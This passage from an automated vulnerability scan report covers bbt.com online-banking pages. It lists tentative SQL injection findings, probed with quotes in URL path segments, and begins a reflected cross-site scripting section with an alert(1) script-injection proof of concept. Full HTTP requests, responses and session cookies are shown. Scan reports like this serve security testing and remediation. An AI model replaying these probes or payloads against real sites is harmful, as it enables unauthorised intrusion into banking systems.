Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:56 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/online-banking/enter-password.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:56 GMT
location: http://bbt.com/bbt/%27%27/online-banking/enter-password.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 163
cache-control: private
x-powered-by: ASP.NET
Content-Length: 167

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/online-banking/enter-password.html">here</a>.</body>

1.17. http://bbt.com/bbt/online-banking/enter-password.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/online-banking/enter-password.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/online-banking'/enter-password.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:01 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/online-banking''/enter-password.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:01 GMT
location: http://bbt.com/bbt/online-banking%27%27/enter-password.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 162
cache-control: private
x-powered-by: ASP.NET
Content-Length: 166

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/online-banking%27%27/enter-password.html">here</a>.</body>

1.18. http://bbt.com/bbt/online-banking/enter-password.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/online-banking/enter-password.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/online-banking/enter-password.html' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:05 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/online-banking/enter-password.html'' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:06 GMT
location: http://bbt.com/bbt/online-banking/enter-password.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 162
cache-control: private
x-powered-by: ASP.NET
Content-Length: 166

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/online-banking/enter-password.html%27%27">here</a>.</body>

1.19. http://bbt.com/bbt/online-banking/forgot-user-id.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/online-banking/forgot-user-id.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/online-banking/forgot-user-id.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/online-banking/forgot-user-id.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:59 GMT
location: http://bbt.com/bbt/%27%27/online-banking/forgot-user-id.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 163
cache-control: private
x-powered-by: ASP.NET
Content-Length: 167

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/online-banking/forgot-user-id.html">here</a>.</body>

1.20. http://bbt.com/bbt/online-banking/forgot-user-id.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/online-banking/forgot-user-id.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/online-banking'/forgot-user-id.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:04 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/online-banking''/forgot-user-id.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:04 GMT
location: http://bbt.com/bbt/online-banking%27%27/forgot-user-id.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 162
cache-control: private
x-powered-by: ASP.NET
Content-Length: 166

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/online-banking%27%27/forgot-user-id.html">here</a>.</body>

1.21. http://bbt.com/bbt/online-banking/forgot-user-id.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/online-banking/forgot-user-id.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/online-banking/forgot-user-id.html' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:09 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/online-banking/forgot-user-id.html'' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:09 GMT
location: http://bbt.com/bbt/online-banking/forgot-user-id.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 162
cache-control: private
x-powered-by: ASP.NET
Content-Length: 166

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/online-banking/forgot-user-id.html%27%27">here</a>.</body>

1.22. http://bbt.com/bbt/sitemap.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/sitemap.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/sitemap.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:57 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/sitemap.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:57 GMT
location: http://bbt.com/bbt/%27%27/sitemap.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 141
cache-control: private
x-powered-by: ASP.NET
Content-Length: 145

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/sitemap.html">here</a>.</body>

1.23. http://bbt.com/bbt/sitemap.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/sitemap.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/sitemap.html' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:02 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/sitemap.html'' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:02 GMT
location: http://bbt.com/bbt/sitemap.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 140
cache-control: private
x-powered-by: ASP.NET
Content-Length: 144

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/sitemap.html%27%27">here</a>.</body>

2. Cross-site scripting (reflected)  previous  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f554d"><script>alert(1)</script>d8ef849160f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f554d"><script>alert(1)</script>d8ef849160f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

